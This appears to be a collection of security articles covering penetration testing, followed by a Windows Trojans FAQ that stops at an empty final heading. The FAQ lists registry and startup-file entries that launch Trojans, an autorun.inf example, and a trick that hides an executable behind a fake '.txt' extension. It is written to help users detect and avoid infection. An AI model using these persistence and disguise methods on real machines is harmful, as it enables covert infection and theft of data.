Vulnerability scanning/analysis

Vulnerability scanning/analysis is an exhaustive examination of targeted areas of an organization's network infrastructure aimed at determining their current state. The targets range from a single system or only critical systems to scanning the entire network. It is usually performed using automated tools that test for a multitude of potential weaknesses in a system against a database of known vulnerabilities and report potential security holes. And although they don't actively prevent attacks, many scanners provide additional tools to help fix found vulnerabilities. Some of the commonly used vulnerability scanners include: the open-source Nessus Project's Nessus, ISS Internet Scanner, GFI Software's GFI LANguard Network Security Scanner, eEye Digital Security's Retina Network Security Scanner, the BindView RMS vulnerability-management solutions and Network Associates CyberCop.



Scenario analysis

Once a vulnerability scanning has been done and weaknesses identified, the next step is to perform Scenario testing. This testing aims at exploiting identified security weaknesses to perform a system penetration that will produce a measurable result, such as stolen information, stolen usernames and passwords or system alteration. This level of testing assures that no false positives are reported and makes risk assessment of vulnerabilities much more accurate. Many tools exist to assist exploit testing, although the process is often highly manual. Exploit testing tends to be the final stage of penetration testing.


Read more...

What makes a good penetration test?




While there are clear advantages of performing a penetration test -- what makes a penetration test worth the exercise is the result. The results need to be of value and easily understandable to the client.



There's a general misconception that penetration testing is all about using fancy automated security tools and handing over the generated reports as the deliverable.


But, it takes more than just security tools to successfully conduct a penetration test. While these automated security-testing tools play an important role within the exercise, they have limitations.


The fact is that these tools can never provide a true simulation of a skilled attacker. No matter how comprehensive reporting is done by the security tools, there's always a need to explain.



Let's take a look at some of the key factors that make a good pen-test:

*  Establish the parameter: Defining the scope of work is the first and most important step to performing a successful penetration test. This will define the boundaries, objectives and the validation of procedures (the success criteria).

*  Know da man: Hire skilled and experienced consultants to perform the test- the ones who know what they are doing. In other words, separate professionals from the amateurs. Make sure they are:

-Legally capable
-Experienced
-And, abide by the non disclosure agreement.

*  Chose adequate set of tests: Manual and automated will yield the best balance of cost/benefits.

*  Follow a methodology: It's not a guessing game. Everything needs to be planned, documented and followed.

*  Resulting value: The results should be documented carefully and efforts should be made to make them understandable to the client. Whether it's a technical report or an executive summary, there is always a need to explain. The security consultant /tester should be available to answer queries or explain results.

*  Findings and recommendations: This is a very important part of a pen-test. The final report must clearly state the findings and must map the same to the potential risks. This should be accompanied by a remediation roadmap based on the BEST SECURITY PRACTICES.

Before we get into the testing strategies and techniques used in penetration testing, let's take a look at some scenarios where it can be useful:


*  Setting up a new office

Whether it's a new business set up or addition of new sites, penetration testing helps identify potential weaknesses in the network infrastructure. For example, an Internal testing is critical when adding new sites, as it will examine which network resources are available and reveal the type of traffic passing between sites.



*  Deployment of new network infrastructure

Every new network infrastructure should be thoroughly tested to simulate the actions of a hacker. While an external test is generally performed (with little prior knowledge of the infrastructure) to ensure perimeter security, the internal testing should also be executed to ensure that network resources such as: servers, storage, routing and access devices are sufficiently hardened and that the infrastructure is secure from any attack, assuming that the perimeter is breached.



*  Changes/upgrade to existing infrastructure

Changes are inevitable -- be it software, hardware or network design, changes/upgrades are performed to either enhance the features; to fix critical bugs and/or to accommodate a new requirement. Whenever existing infrastructure is changed, it should be tested again to ensure that new vulnerabilities have not arisen. The amount of testing required will depend on the nature and level of the changes made to the infrastructure. While, minor changes such as configuration changes to a particular rule will only require a port scan to ensure the expected firewall behaviour, any major changes such as upgrades of critical equipment/OS version may require a full retest.



*  Rolling out a new application

Once the infrastructure has been thoroughly tested, the new applications (whether Internet facing or Intranet hosted) must also be tested for security blanket before they are put in production. This testing needs to be performed on a "real-life" platform, ensuring that the application only uses the defined ports and that the code itself is secure.



*  Changing/upgrading an existing application

As with infrastructure changes, application changes also vary in nature. Very minor changes such as user account changes will not require testing. However, major changes involving the functionality of the application should be thoroughly retested.



*  Periodic repeat testing

Managing security is not easy and companies should not consider a penetration test as the final remedy of all security problems. If a company considers it "so," they are falling for a false sense of security. It's always a good practice to perform periodic testing of sensitive systems to ensure that unscheduled changes have not been made.
Read more...

Why penetration testing?


Penetration testing is one of the oldest methods for assessing the security of a computer system. In the early 1970's, the Department of Defense used this method to demonstrate the security weaknesses in computer systems and to initiate the development of programs to create more secure systems.

Penetration testing is increasingly used by organizations to assure the security of Information systems and services, so that security weaknesses can be fixed before they get exposed.

The frequency and severity of network intrusion, data theft and attacks caused by malicious code, hackers, disgruntled employees continues to increase and the risks and costs associated with network security breaches and data theft are astronomical.

With every ebusiness initiative, the demand for secure, remote access to company networks is also increasing. The truth is, even well managed implementations, involving the latest hardware and software may be susceptible to misconfigurations or software flaws.

These may eventually give an intruder access to sensitive information. Using penetration testing tools can significantly reduce the risk of this occurring.



While the principal objective of penetration testing is to determine security weaknesses in an organization's network infrastructure; it can have number of secondary objectives, including testing the organization's security incidents identification and response capability, testing employee security awareness or testing security policy compliance.


Reasons to perform a network penetration test

• A penetration test helps organizations to understand their current security posture by identifying gaps in security. This enables organizations to develop an action plan to minimize the threat of attack or misuse.

• A well-documented penetration test result, helps managers in creating a strong business case to justify a needed increase in the security budget or make the security message heard at the executive level.

• Security is not a single point solution, but a process that requires due diligence. Security measures need to be examined on a regular basis to discover new threats. A penetration test and an unbiased security analysis enable organizations to focus internal security resources where they are needed most. In addition, the independent security audits are rapidly becoming a requirement for obtaining cyber-security insurance.

• Meeting regulatory and legislative requirements are a must for conducting businesses today. Penetration testing tools help organizations meet these regulatory compliances.

• One of the core objectives of an e-business initiative is to enable close working with strategic partners, suppliers, customers and others upon whom the ebusiness depends. To accomplish this goal, organizations sometimes allow partners, suppliers, B2B exchanges, customers and other trusted connections into their networks. A well executed penetration test and security audits help organizations find the weakest links in this complex structure and ensure that all connected entities have a standard baseline for security.

• Once security practices and infrastructure is in place, a penetration test provides critical validation feedback between business initiatives and a security framework that allows for successful implementation at minimal risk.



Read more...

01.Introduction


Trojan Horses pose one of the most significant threats to the Windows OS, thus exposing sensitive information to malicious attackers, as well as providing them with full access to the computer, which often results in further illegal activities done via the infected computer. This paper will cover the Windows Trojans topic in-depth, it will highlight a lot of the important aspects, but will also act as a FAQ, summarizing the topic in a brief, easy to understand, yet effective and informative way. The FAQ will be updated on a monthly basis, so be sure to come back, although we've created a Newsletter for your convenience that will let you know when the site is being updated.

02.What is a Trojan horse?

Basically a Trojan horse can be defined as:

An unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user.

A legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user.

Any program that appears to perform a desirable and necessary function but (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.

The trojan has borrowed it's name from the old mythical story about how the Greeks gave their enemy a huge wooden horse as a gift, but after the enemy accepted it, during the night the Greek soldiers crept out of the horse and conquered the city.


03.How do Trojans work?


Most trojans come in two parts, a Client, and a Server, but there are exceptions where the trojan does not need a Client, as it's able to automatically do what it was intended to do (stealing passwords, business data etc.), without any intervention from the attacker. However those who use both Client and Server in order to operate need assistance from the attacker. Once the victim runs the Server (unknowingly), the attacker will use a port to connect to the Server (your computer) and start using the Trojan.TCP/IP is the usual protocol used, but there are exceptions using ICMP, and UDP as well. When the Server is executed on the victim's machine, it will hide itself somewhere within the computer and start listening on the specified by the attacker port. However there are trojans that automatically listen for incoming connections once run, which will wait a period of time to reduce the risk of being detected.



It's necessary for the attacker to know the victim's IP address to connect to his/her machine. Many trojans have features such as the ability to mail the victim's IP, as well as the ability to message the attacker via ICQ or IRC. This is used when the victim has a dynamic IP, which means that every time you connect to the Internet you

get a different IP (most of the dial-up users have this). ADSL users have static IPs so the infected IP is always known to the attacker and this makes it considerably easier to connect to your machine.



Most of the Trojans use Auto-Starting Methods in order to auto-run each time your computer is started. These methods include, but are not limited to, using the Windows Registry, using some of the Windows's System Files, as well as using third party configuration files.



System files are located in the Windows Directory. Here is a brief explanation of most of the common auto-starting methods that use the Windows System Files:



Autostart Folder

The Autostart folder is located in C:\Windows\Start Menu\Programs\startup and as its name suggests, automatically starts everything placed within this folder.



Win.ini

Windows system file using load=Trojan.exe and run=Trojan.exe to execute the Trojan.



System.ini

Using Shell=Explorer.exe trojan.exe results in execution of every file after Explorer.exe



Wininit.ini

Mostly used by Setup-Programs. Once it is run, it is auto-deleted, which is very handy for trojans to restart.



Winstart.bat

Acting as a normal bat file, the trojan is added as @trojan.exe to hide its execution from the user.



Autoexec.bat

It's a DOS auto-starting file and it's used as an auto-starting method like this -> c:\Trojan.exe



Config.sys

Could also be used as an auto-starting method for trojans



Explorer Startup

Is an auto-starting method for Windows95, 98, ME and if c:\explorer.exe exists, it will be started instead of the usual c:\Windows\Explorer.exe, which is the common path to the file.



Windows Registry is another commonly used place regarding the auto-starting methods of the Trojans. Here are some known ways:



[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]

"Info"="c:\directory\Trojan.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]

"Info"="c:\directory\Trojan.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]

"Info"="c:\directory\Trojan.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]

"Info="c:\directory\Trojan.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

"Info"="c:\directory\Trojan.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]

"Info"="c:\directory\Trojan.exe"



- Registry Shell Open



[HKEY_CLASSES_ROOT\exefile\shell\open\command]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command]



A key with the value "%1 %*" should be placed there and if there is some executable file placed there, it will be executed each time you open a binary file. It's used like this: trojan.exe "%1 %*"; this would restart the trojan.



- ICQ Net Detect Method



[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\]



This key includes all the files that will be executed when ICQ detects an Internet connection. As you can understand, this feature of ICQ is very handy but it's frequently abused by attackers as well.



- ActiveX Component



[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\InstalledComponents\KeyName]

StubPath=C:\directory\Trojan.exe



All of the aforementioned methods are well known to the community, although you should not rely on them (by checking these Registry Entries, as well as the System Files ones) as a foolproof method for detecting Trojans, because new methods are discovered literally every day.






04.What are their functions?



Windows Trojans vary in their functions and abilities, although here's a brief summary of the most common ones:



Change the victim's resolution. This function displays a list with all the resolutions available on the victim's computer and the attacker just pick one and hit "change it!", after that you'll have your resolution changed

Notify. The attacker is notified by e-mail, ICQ, IRC when you're online, as well as your IP if you have a dynamic one

Processes monitoring. The attacker has the ability to monitor all of your processes, start new ones, as well as the ability to kill current one.

Registry editor. It gives to the attacker, the ability to view/create/delete/change everything in the registry.

Find files feature. Provides the attacker with the opportunity to find any file on the hard drive, if he/she is looking for something particular.

ScrollLock, CapsLock, NumLock can be turned ON and OFF by the attacker, this function is defined as a "fun" one.

Disconnect victim. The attacker can hang up the victim's connection to the net at anytime.

Screenshot. The attacker can make screenshots of your activities, which are directly transferred to his/her computer, however there are more advanced functions including Web Cam monitoring, as well as microphone recording, if you have any of these of course.

Flip Screen. That's an obvious one, and it's again considered as a "fun" one

Hide/Show the victim's desktop icons. Annoying the victim is what amuses people sometimes.

FTP server. This option turns your PC into a FTP server accessible by the whole world, or to the attacker only.

Open the browser at an address specified by the attacker.

Hide/show the Start button.

Enable/Disable keyboard.

Chat with the victim. Interesting function enabling the attacker to open an ICQ look-alike chat with the victim.

Start/stop the victim's PC Speaker.

Restart windows.

Open/Close the CD-ROM tray.

Turn monitor on/off.

Get more information about the victim's computer. For exmaple: windows version, user name, company name, screen resolution, etc.

File manager. This function acts as an explorer for the attacker while browsing through your system.

Retrieve passwords. This function will provide the attacker with the recorded passwords on your computer.

KeyLogger. Logs all of the keys you've pressed, could be achieved in offline/online mode.

There you have the most common Trojan's functions. As you've noticed most of these could be, and are, pretty dangerous and destructive ones.


05.How dangerous are they?


Windows Trojans represent a large security threat to your computer. Here I'll cover various scenarios, as well as provide you with further information so that you'll be able to realize how dangerous they are indeed.



As you've noticed while reading all of the aforementioned functions, they can be pretty dangerous. The attacker can have access to ALL of your files, personal information, sensitive work projects, and other confidential information just using the Keylogger, and the Explorer functions. In most cases the attacker will be looking for:



Credit Card Information (often used for domain registration, shopping with your credit card).

Any accounting data (E-mail passwords, Dial-Up passwords, WebServices passwords, etc.).

Email Addresses (Might be used for spamming, as explained above).

Work Projects (Steal your presentations and work related papers).

Children's names/pictures, Ages (pedophile attacker?!).

Schoolwork (steal your papers and publish them with his/her name on it).

You should realize that Trojans can be very destructive, and that they're not only used to delete files, but to steal people's work, job projects, and many other illegal activities.



On the other hand some advanced attackers will use your computer in order to commit further online crimes, and involve you in other illegal activities, thus turning your computer into a proxy, enabling them to move through your computer without any traces left, before they reach their potential aim. It can be illustrated as:



attacker--->your computer--->computer to be attacked

(turned into a proxy)



As you can see this is extremely dangerous to you, as the traces will lead back to you, no matter what is the attacker doing while having access to your PC, in 99% of the cases it will be an illegal activity.



You can contribute to a DDoS (Distributed Denial Of Service Attack), as your computer might be turned into the so called "zombie", proving the attacker with the ability to use your bandwidth for flooding and causing damage to other networks.



06.What are the most common Trojans?


Here are the most popular kinds, although most of these represent a combination of several more, and let's not forget the non-public ones, which will never be released to the public, and are used for the attacker's illegal activities, those are some of the most dangerous ones.



Remote Access Trojans (RAT's)



These are probably the most publicly used Trojans, simply because they give the attackers the power to do more things on the victim's machine than the victim himself, while standing in front of the machine. The idea of these Trojans is to give the attacker COMPLETE access to someone's machine, and therefore access to files, private conversations, accounting data, etc.



Password Sending Trojans



The purpose of these trojans is to rip all cached passwords and also look for other passwords you're entering, then sends them to a specific mail address without the user noticing anything. Passwords for ICQ, IRC, FTP, HTTP or any other application that require a user to enter a login+password are being sent back to the attacker's e-mail address.



Keyloggers



These trojans are very simple. The only thing they do is to log the keystrokes of the victim and then let the attacker search for passwords or other sensitive data in the log file. Most of them come with two functions such as online and offline recording. Of course they could be configured to send the log file to a specific e-mail address on a daily basis.



Destructive



The only function of these trojans is to destroy and delete files. This makes them very simple and easy to use. They can automatically delete all your core system files (for example: .dll, .ini or .exe files, possibly others) on your machine.



Denial Of Service (DoS) Attack Trojans



These trojans are becoming very popular these days, giving the attacker the power to start a DDoS if having infected enough victims of course. The main idea is that if you have 200 ADSL users infected and start attacking the victim simultaneously, this will generate a LOT of traffic (more then the victim's bandwidth, in most cases) and its the access to the Internet will be shut down. WinTrinoo is a DDoS tool that has become really popular recently, and if the attacker has infected many ADSL users, major Internet sites could be shut down as a result, as we've seen it happened in the past few months.



Another variation of a DoS trojan is the mail-bomb trojan, whose main aim is to infect as many machines as possible and simultaneously attack specific e-mail address/addresses with random subjects and contents which cannot be filtered.



Proxy/Wingate Trojans



An interesting feature implemented in many trojans is the ability to turn the victim's computer into a proxy/wingate server available to the whole world or only to the attacker. It's used for anonymous Telnet, ICQ, IRC, etc., and also to register domains with stolen credit cards and for many other illegal activities. This gives the attacker complete anonymity and the chance to do everything from YOUR computer and if he/she gets caught the trace leads back to you.



FTP Trojans



These trojans are probably the simplest ones and are kind of outdated as the only thing they do is open port 21(the port for FTP transfers) and let EVERYONE connect to your machine or only the attacker. Newer versions are password protected so only the one that infected you may connect to your computer.



Software Detection Killers



There are such functionalities built into some trojans, but there are also separate programs that will kill ZoneAlarm, Norton Anti-Virus and many other (popular anti-virus/firewall) programs that protect your machine. When they are disabled, the attacker will have full access to your machine, enabling the attacker to perform some illegal activity, use your computer to attack others and often disappear. Even though you may notice that these programs are not working or functioning properly, it will take you some time to remove the trojan, install the new software, configure it and get back online with some sense of security.

07.In what ways could I be infected?




The Complete Windows Trojans Paper discusses in-depth each of the possible scenarios as far as becoming infecting with a trojan is concerned. You're strongly advised to closely look at them, thus being able to understand and properly react to the threat posed by the Windows Trojans.



Via ICQ



People don't understand that they can also get infected while talking via ICQ or any other Instant Messenger Application. It's all risky when it's about receiving files no matter from whom and no matter from where.



Believe it or not, there are still guys out there using really old versions of ICQ and it's all because they can see the IP of the person they're talking to. The older versions of ICQ had such functionality and it was useful for everyone capable of using winnuke and other DoS tools, but really how hard is it to launch such attacks with only the click of the mouse? These people are often potential victims of someone that is more knowledgeable on Windows Trojans and takes advantage of their old ICQ versions.



Let's review various ways of getting infected via ICQ:



You can never be 100% sure who's on the other side of the computer at that particular moment. It could be someone that hacked your friend's ICQ UIN (Unique Identification Number) and wants to spread some trojans among his/her friends. You'll definitely trust your best dude Bob if he offers you something interesting, but is it really Bob on the other side?

Old versions of ICQ had bugs in the WebServer feature, which creates a site on your computer, with your info from the ICQ database. The bug constitutes a security hole in that the attacker can have access to EVERY file on your machine and if you read the previous sections carefully and know the auto-start methods, you'll probably realize what could happen if someone has access to your win.ini or other system file, namely a trojan installed in a few minutes.

Trojan.exe is renamed Trojan....(150 spaces).txt.exe, icon changed to a real .txt file and this will definitely get you infected. This bug has almost certainly been fixed in the newer version.

No matter which Instant Messenger Application you're using, you could always get yourself infected by certain program bugs that you have never had the chance to hear about, and never took the precaution of checking for newer versions of the application. Also when you're receiving files no matter where and no matter from whom, take this potential threat very seriously and recognize the dangers of naive behavior.



Via IRC



So many people LIVE on IRC and this is another place where you can get yourself infected. Trust is vital no matter what you're doing. No matter who is sending you files, whether they are pretending to be free porn archive, whether offering software for "free internet" or offering a Hotmail hacking program, DO NOT download any of these files. Newbies are often targets of these fakes, and believe me, many people are still newbies where security is concerned. Users get infected from porn-trade channels, and of course, warez channels, as they don't think about the risk but think only of getting free porn and free programs instead.



Here are several scenarios of how you may become infected while using IRC:



You're talking with someone, probably a "girl", having great time and of course, you want to see the person you're talking to. You ask for a picture or the "girl" offers you her pictures and I'm sure you'll definitely want to see them. The "girl" says that she has just created her first screensaver using some known free or commercial software and offers it to you, but how about if "she" mentions several pictures are nude ones?! You have been talking to "her" for a week or so, you get this screensaver.exe, you run it and yeah, VERY nice pics. Some are nude and she hasn't lied to you so nothing bad or suspicious has happened BUT think again what really has happened!

Trojan.exe could also be renamed into Trojan.scr like a screensaver extension and will again run properly when you execute it so pay attention about these file extensions.

Trojan.exe is being renamed Trojan....(150 spaces).txt.exe you'll get the file over IRC and in the DCC it will appear as .TXT and as a result you won't become suspicious, run it and get yourself infected again. In all of these examples the icon of the file is changed of course, because it needs to be the same icon as a normal .TXT and this fools victims very often.

Most people don't notice in their Explorer that the Type of the file is Application BUT with a .TXT icon. So BEFORE you run something, even if it's with a .TXT icon, check its extension and make sure it really is a text file.

Via Attachments



I'm always amazed by the number of people that get themselves infected by an attachment sent to their mailboxes. Most of these users are new to the Internet and are pretty naive. When they receive an email containing an attachment saying that they will get free porn, free Internet access etc., they run it without completely understanding the risk to their machines. Check the following scenario: you know your friend Alex is a very skilled Visual Basic programmer. You also know he's coding his latest program but you're curious as to what it is all about, and when he finishes coding the application you wait for an e-mail from him with the attachment. Yeah, but the person targeting YOU also knows that. The attacker also knows your friend's e-mail address. Then the attacker will simply code some program or get some freeware one, use some relaying mail server to fake the e-mail's FROM field and make it look like your friend's one. Alex's e-mail address is alex@example.com so the attacker's FROM field will be changed to alex@example.com and of course, it will include the TROJANED attachment... You'll check your mail, see that Alex finally has his program ready and has sent it as an attachment. You'll download and run it without thinking that it might be a trojan or something else, because hey, Alex wouldn't do something like that to me, he's my friend, and in this way you've just been infected.



Information Is Power! Simply because the attacker knew you were waiting for some particular file, he went ahead and found Alex's e-mail address and infected you...the timing of the attack assumes importance here. And it all happened just because you were naive, just because you saw alex@example.com in the FROM field, and just because you didn't check the mail headers to see that the mail actually came from some .jp mail server relaying e-mails and has been used by spammers for several months.



Many people have gotten themselves infected by the famous "Microsoft Internet Explorer Update" sent directly to their mailboxes, by the nonexistent Microsoft Updates Staff. I understand you may have felt great because Microsoft were paying you special attention and sent you the latest updates, but these "updates" are definitely trojans. Microsoft will NEVER send you updates of their software via e-mail even if you see that the FROM field is updates@microsoft.com and as you've noticed in the previous example the FROM field could be and IS faked. If you ever notice some mail in your mailbox with subjects like "Microsoft IE Update" and such, delete WITHOUT viewing or reading the e-mail, because some E-Mail clients like Outlook Express and others, have bugs that automatically execute the file being attached in the e-mail WITHOUT you even touching it. As you can imagine this is an extremely dangerous problem that requires you to keep yourself constantly up-to-date with the latest version of any software you're using.



Physical Access



Physical access is vital for your computer's security. Imagine what an attacker could do while having physical access on your machine, and let's not forget to mention that if you're always connected to the Internet and leave the room for several minutes that you've just given long enough of a chance to get yourself infected. Here I'll illustrate several scenarios often used by attackers to infect your computer while they're having physical access to your machine. There are some very smart people out there that keep thinking of new ways of gaining physical access to someone's computer. Here are some tricks that are interesting:



Your "friend" wants to infect you with a trojan and he/she has physical access to your machine. Let's say you were at home surfing the net, chatting or whatever. Suddenly your "friend" asks you for a glass of water, knowing that you'll go in another room and will be away for 1 or 2 minutes. While you do that, he/she takes out a diskette of his/her pocket and infects your unprotected PC. You came back and everything is OK because your "friend" is doing exactly the same thing before you left ...surfing the net.

The next example is when 2 guys want to take revenge on you cause of something and are supporting each other in order to accomplish their task. Again you are at home with your "friend", surfing, chatting, whatever you're doing; suddenly the telephone rings and a "friend" of yours wants to speak with you for something that is really important. He/she asks, "Is there anyone around you? If so, please move somewhere away from him/her (after knowing it is him or her, of course). I don't want anyone to listen what I'm going to tell you". The victim is again lured away from the computer, leaving the attacker to do whatever he/she wants on the target computer.

Other approaches similar to the previous ones might be a sudden ring of the doorbell, as well as other variations of phone calls and conversations leaving the attacker alone with the victim's computer. There are so many other possible approaches; just think for a while and you'll see what I mean and how easily you could be tricked, and it's because you're not suspicious enough when it comes to your sensitive computer data.

Another method of infecting a computer while having physical access is through use of the Auto-Starting CD function. You've probably noticed that when you place a CD in your CDROM it automatically starts with some setup interface. Here's an example of the Autorun.inf file that is placed on such CD's:

[autorun]

open=setup.exe

icon=setup.exe



So you can imagine that while running the real setup program a trojan could be run VERY easily, and since most of you probably aren't aware of this CD function, you will become infected and won't understand what has happened and how it has been done. Yeah, I know it's convenient to have the setup.exe autostart but security is what really matters here, that's why you should turn off the Auto-Start functionality by doing the following:



Start Button->Settings->Control Panel->System->Device Manager->CDROM->Properties->Settings



And there you'll see a reference to Auto Insert Notification. Turn it off and you won't have any problems with that function anymore.



I know MANY other variations of physical access infections but these are the most common ones so pay attention and try to think up several more by yourself.



When the victim IS connected to the Internet:



Here we have many variations. Again, I'll mention the most common ones. While the attacker has physical access he/she may download the trojan.exe, using various ways just by knowing how various Internet protocols work.



A special IRCbot known only to the attacker is available in IRC whose only function is to DCC the trojan.exe back to the attacker whenever he/she messages the bot with a special command. The victim will probably be away from the computer.

The attacker wants to download a specific software such as a new version of some program infected with a trojan of course, and visits some URL known only to him/her and then downloads the trojan.

The attacker pretends he/she wants to check his/her (web based) mail (for example, at Yahoo! or HotMail) but in fact has the trojan.exe stored in his/her mailbox and simply downloads and executes the file, hereby infecting the computer. In this case the mail service is used as a storage area.

There are many more ways of infecting the victim while connected to the Net, as you can imagine. Any of these examples will succeed but it all depends on the victim's knowledge of the Internet and how advanced his/her skills are, so the attacker needs to check these things somehow before doing any of the activities that I have mentioned here. After that, the attacker will be able to choose the best variant for infecting the victim and doing the job.



Browser And E-mail Software Bugs



Users do not update their software versions as often as they should be, and a lot of the attackers are taking advantage of this well known fact. Imagine you are using an old version of Internet Explorer and you visit a (malicious) site that will check and automatically infect your machine without you having downloaded or executed any programs. The same scenario occurs when you check your E-mail with Outlook Express or some other software with well known problems. Again you will be infected without having downloaded the attachment. Make sure that you always have the latest version of your Browser and E-mail Software, thus reducing the risk to a minimum.



Netbios(File Sharing)



If port 139 on your machine is opened, you're probably sharing files and this is another way for someone to access your machine, install trojan.exe and modify some system file, so it will run the next time you restart your PC. Sometimes the attacker may use DoS (Denial Of Service Attack) to shut down your machine and force you to reboot, so the trojan can restart itself immediately. To block file sharing in Win ME, go to:



Start->Settings->Control Panel->Network->File And Print Sharing



And uncheck the boxes there. That way you won't have any problems related to Netbios abuse.



Fake Programs



Imagine a Freeware SimpleMail program that's very suitable for your needs, and very handy with its features like address book, option to check several POP3 accounts and many other functions that make it even better then your E-mail client and the best thing for you is that it's free. You use ZoneAlarm or any other similar protection software, and mark the program as a TRUSTED Internet server so none of your programs will ever bother you about that program as you are probably using it every day because it's working very well, no problems ever occurred, you're happy, but a lot of things are going on in the background. Every mail you send and all your passwords for the POP3 accounts are being mailed directly into the attacker's mailbox without you noticing anything. Cached passwords and your keystrokes could be also mailed and the idea here is to gather as much info as possible and send it to the attacker. This info includes credit card numbers, passwords for various applications and many other things. Fake programs that have hidden functions often have professional looking web sites, links to various anti-trojan software mentioned as affiliates and make you trust the site; readme.txt is included in the setup and many other things to fool you into trusting it. Pay attention to freeware tools that you download, regard them as extremely dangerous and as a very useful and easy way for attackers to infect your machine with a Trojan.



Freeware Software, and the so called "Hackers" Web Sites



A site located at some free web space provider or just offering some programs for illegal activities can be considered as an untrusted one. As you know, there are thousands of "hacking/security" archives on these free web space providers like Xoom, Tripod, Geocities and many many others. These sites have archives filled with "hacking" programs, scanners, mail-bombers, flooders and many other tools. The guy who created the site infects often several, if not all of these programs. It's highly risky to download any of the programs and the tools located on such untrusted sites; no matter which software you use. Are you ready to take that risk? There are some untrusted sites that look REALLY professional and boast huge archives full of Internet related software, feedback forms and links to other popular sites. I think if you take some time, look deeper, scan all the files you download, then you can decide on your own whether the site you are downloading your software from is a trusted or an untrusted one. Freeware programs should be considered suspicious and extremely dangerous due to the fact that it's a very easy and useful way for the attacker to infect your machine with some freeware program. No matter how suitable you find the program, remember that "free is not always the best" and it's very risky to use any of these programs. My advice is: before using a freeware program, do search for some reviews on it, check popular search engines, and try to look up for some info about it. If you find any reviews written by respected sites, that means they've used and tested it and the chance of infection is hereby minimized. If no reviews or comments about the software are found via the search engines, then it may be highly risky to start using it.

08.How am I endangering my company's data once infected?


Once infected, critical business data could be exposed to a malicious attacker or a corporate spy. You should not assume that the data is properly protected by the company's firewall, and that even if you get infected, that there would be no way for the attacker to get the data. Firewalls are essential and will block their attempts to connect to the Server (your computer), however attackers are becoming more creative and adaptive, so there are ways to retrieve the data without the need to connect to your computer. You can also unknowingly participate in exposing the whole network to attack, there at work, just by having your computer infected with a Trojan Horse.

09.Why would they target me, or my company?



In fact most of the times no one is targeting you in particular, it's just your bandwidth and the access to your computer that they're trying to get to. However there is the possibility that someone wants to attack you or your company in order to obtain classified business or sensitive personal data.

10.Do Anti-Virus Scanners provide reasonable protection?



You must realize that there isn't a 100% sure way of protecting against Windows Trojans infections, although your major aim is to significantly reduce the risk by understanding how they work and how you could become infected.



This type of software relies mainly on the "signatures" that each trojan executable has and also it's common auto-starting methods. But this is not a perfect solution by far for protecting yourself against trojans, as they use many other methods to hide inside the machine, most of which are undetected by Anti-Virus Software. When trojans first became a big security breach, specific Anti-Trojan packages were released to the public and it was necessary for the AVs to start detecting not only viruses, but also trojans if they wanted to attract new users. As a result, most of them became really advanced trojan scanning and detection systems, but for maximum protection it's recommended to use both Anti-Virus and Anti-Trojans software. Public trojans appear online almost every day and detection software is being updated every day to provide its customers with maximum protection. One very big problem is that the users do not update their signature files as often as they should be, thus having detection software that's not detecting several of the latest trojans or viruses. Users MUST update their software's signature files every day, and it will take them only several minutes. Each and every time a new file is downloaded, it MUST be scanned BEFORE being opened with Anti-Virus and Anti-Trojan software. If you think the file is suspicious for any reason, do NOT run it, but send it to your detection software labs for analysis.


11.Are there any effective Anti-Trojan Packages?


Yes, there are, although you should never fully rely on them as they only partly solve the problem. It's you who has the responsibility of maintaining an acceptable level of protection. While these Packages should be used on standalone computers or very small networks, it is recommended that companies use Gateway protection Packages if they seek an improvement in their security by limiting the dangers posed by their Internet connectivity.



Here are links for some of the popular Anti-Trojan Packages that should be used in the company's Defense In Depth methodology, whose main purpose is to put another line of Security by protecting the end users workstations.



Enduser Protection Packages



TDS-3

Trojan Defense Suite (TDS) is an indispensable, must-have software package for protection against trojans. It has many unique functions never seen in other Anti-Trojan packages. The program has really advanced features and if you're a newbie, it will probably take some time before you are able to use the software at its full capacity (read the excellent help files).



You can get TDS from http://tds.diamondcs.com.au/



Tauscan

Trojan scanner that has unique features and is a must have. It's also able to detect new trojans and trojans that have never been released to the public. More info at its official page: http://www.agnitum.com/products/tauscan/



Trojan Hunter

Trojan detection package with a lot of functions. It's very handy.

More info at http://www.mischel.dhs.org/trojanhunter.jsp



Gateway Protection Packages



GFI MailSecurity - More Info

McAfee Internet Gateway Protection - More Info

TrendMicro's Internet Gateway - More Info

Symantec AntiVirus Gateway Solution - More Info

Symantec AntiVirus for SMTP Gateways - More Info

Free Online Trojan Scanning



GFI TrojanScan - More Info




12.How do I know whether I have been infected?


The most common trojans features have been listed above, so that by knowing them you'll be able to detect suspicious activities going around your computer. However you should keep in mind that advanced attackers will keep as silent as possible, in order to continue their illegal actions on your computer. The following events should be considered as a suspicious one:



It's normal to visit a web site and several more pop-ups appear with the page you've visited. But alternatively, suddenly your browser directs you to some page unknown to you without you having done anything at all. Take that as a serious indication of infection.

A strange and unknown Windows Message Box appears on your screen, asking you some personal questions.

Your Windows settings change by themselves like a new screensaver text, date/time, sound volume changes by itself, your mouse moves by itself, CD-ROM drawer opens and closes.

You doing absolutely nothing, no Internet related applications are running, but your modem lights are going crazy, just the way they are when you're downloading files or actively using the Internet. Consider this as an extremely suspicious sign.

GFI Software has released the GFI Trojan scanning service, which is another highly recommended way to scan your computer for Trojans. Access the service here.





13.What should I do once infected?

